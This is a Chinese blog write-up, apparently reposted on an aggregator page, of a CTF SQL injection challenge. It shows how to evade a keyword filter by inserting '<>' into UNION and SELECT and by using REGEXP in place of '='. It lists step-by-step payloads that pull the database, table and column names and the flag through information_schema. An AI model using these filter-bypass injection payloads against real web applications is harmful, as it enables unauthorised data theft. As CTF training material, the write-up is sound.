i春秋 “百度杯”CTF比赛九月场 SQL - 代码天地

i春秋 “百度杯”CTF比赛九月场 SQL

其他 2018-09-24 23:19:11 阅读次数: 0

版权声明：欢迎提问：[email protected] https://blog.csdn.net/include_heqile/article/details/82670026

https://www.ichunqiu.com/battalion?t=1&r=0

看题目就知道这是一道注入题，这道题其实并没有什么难度，主要就是select、union、=等被过滤了，我们需要找到一种有效的绕过方法，这道题的绕过方法就是在敏感字符串中间加上<>，这个是通过提交各种特殊字符串并查看源代码得到的，当我们提交了<>之后，再去查看源代码，会发现源代码界面中并没有出现<>，这样我们就能进行手工注入的一般操作了：

查询显位：?id=1 un<>ion se<>lect "show1", "show2", "show3"

这里写图片描述
由此可知显示位一共三个，第二个为显位

得到数据库名：?id=1 un<>ion se<>lect 1, (se<>lect database()),3
这里写图片描述

得到数据库中的表：?id=1 un<>ion se<>lect 1, (se<>lect group_concat(table_name) from information_schema.tables where table_schema REGEXP 'sqli'),3

这里写图片描述
因为等号被过滤了，所以我们使用REGEXP来代替，不知道为什么没有过滤'

得到表中的字段：?id=1 un<>ion se<>lect 1, (se<>lect group_concat(column_name) from information_schema.columns where table_name REGEXP 'info'),3

这里写图片描述

最后直接查询info表中flAg_T5ZNdrm字段：?id=1 un<>ion se<>lect 1, (se<>lect group_concat(flAg_T5ZNdrm) from info),3

这里写图片描述

猜你喜欢

转载自blog.csdn.net/include_heqile/article/details/82670026

i春秋 “百度杯”CTF比赛九月场 SQL

i春秋 “百度杯”CTF比赛九月场 Code

i春秋 “百度杯”CTF比赛九月场 123

i春秋 “百度杯”CTF比赛九月场 SQLi

i春秋 “百度杯”CTF比赛九月场 XSS平台

i春秋 “百度杯”CTF比赛九月场 YeserCMS

i春秋 “百度杯”CTF比赛九月场 Upload

i春秋 “百度杯”CTF比赛九月场 Test

i春秋 “百度杯”CTF比赛九月场再见CMS

百度杯”CTF比赛九月场SQLi ---------i春秋

百度杯”CTF比赛九月场Upload ---------i春秋

“百度杯”CTF比赛九月场 SQL-writeup

“百度杯” CTF比赛九月场 Web-SQL

百度杯”CTF比赛九月场 Web SQL

i春秋——“百度杯”CTF比赛十月场——Vld（Vulcan Logic Dumper 、php opcode、sql 报错注入）

i春秋——“百度杯”CTF比赛九月场——123（Apache解析pht,phtml,php3等 php别名）

i春秋百度杯九月场 SQLi wp

i春秋 “百度杯”CTF比赛十月场 GetFlag

i春秋 “百度杯”CTF比赛十月场 Login

i春秋 “百度杯”CTF比赛十月场 Exec

i春秋 “百度杯”CTF比赛十月场 web题 Backdoor

i春秋 “百度杯”CTF比赛十月场Not Found

i春秋 “百度杯”CTF比赛十月场 Vld

i春秋-“百度杯”CTF比赛十月场-Login

暑期练习web13：web test（i春秋）百度杯九月场

暑期web练习9：web123（i春秋）百度杯九月场

i春秋 “百度杯”CTF比赛 2017 二月场爆破-1、爆破-2、爆破-3

i春秋-“百度杯”CTF比赛十月场-我要变成一只程序猿

i春秋-百度杯”CTF比赛十月场-那些年我追过的贝斯

i春秋——“百度杯”CTF比赛十月场——EXEC（命令执行、带外通道传输数据）

今日推荐

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

报告：Django 仍然是 74% 开发者的首选

《2024 年一季度互联网投融资运行情况》研究报告

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

周排行

curl的POST请求，封装方法

8.1.1. Integer Types

Java基础 Day05(个人复习整理)

Python - Django - 中间件 process_exception

小L的试卷

【Shell编程】（函数）判断用户是否存在

python(css样式)

spring ant path 匹配原则 - 【笔记】

《JavaScript与JScript从入门到精通》(美)James.Jaworski.中译本.扫描版.pdf

Eclipse运行带参数的java程序

每日归档

更多

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)